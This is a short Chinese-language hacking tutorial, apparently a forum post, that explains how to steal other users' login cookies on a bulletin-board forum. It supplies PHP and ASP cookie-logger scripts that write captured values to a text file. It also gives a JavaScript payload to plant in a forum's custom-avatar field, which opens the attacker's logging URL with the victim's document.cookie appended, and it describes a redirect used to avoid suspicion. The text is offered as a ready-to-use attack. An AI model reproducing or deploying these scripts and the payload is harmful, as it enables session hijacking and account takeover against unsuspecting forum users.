以下是获取cookie的php源代码： 

$info = getenv("QUERY_STRING"); 
if ($info) { 
$fp = fopen("test.txt","a"); 
fwrite($fp,$info."\n"); 
fclose($fp); 
} 
?> 

 

如果得到cookie,则在空间中生成test.txt，为了不引起怀疑，将自动把网页转换到http://xiaomutou.51.net/bbs/,把它上传到支持php的空间上。比如这里我把它传到 http://my.51.net/info2.php 然后注册一个用户（强烈建议大家注册英文用户，如baobaoguai） 我们在“关于自定义头像”中插入如下代码： 
java script:window.open('http://my.51.net/info2.php?'+document.cookie); 

然后提交，现在这个的头像已经成了一段偷cookie的特殊代码。现在回到首页，看看在线成员列表，点我们刚才注册的用户，看，它弹出了两个窗口，一个是关于baobaoguai这个用户的资料，另一个则是http://my.51.net/bbs/ 

获取cookie的asp源代码： 

<% 
testfile=Server.MapPath("cookies.txt") 
msg=Request("msg") 
set fs=server.CreateObject("scripting.filesystemobject") 
set thisfile=fs.OpenTextFile(testfile,8,True,0) 
thisfile.WriteLine(""&msg& "") 
thisfile.close 
set fs = nothing 
%>